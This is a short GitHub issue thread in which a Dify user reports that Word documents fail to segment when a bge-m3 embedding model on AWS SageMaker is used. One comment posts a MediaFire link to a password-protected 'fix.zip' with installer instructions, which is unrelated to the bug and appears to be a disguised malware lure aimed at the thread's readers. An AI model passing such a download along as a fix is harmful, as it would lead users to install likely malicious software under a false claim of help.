### ISSUE TITLE
Knowledge Base Segmentation error when using bge-m3

### ISSUE THREAD

**Issue by KevinZhao** [langgenius/dify#7765]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.0

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

I am using bge-m3 embedding model hosted on AWS sagemaker, when I enabled it, the word document cannot be segmented when I upload it, while pdf file working fine, can you guys confirm it is a bug, or any other work around.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by crazywoola** [comment]
What did you upload?
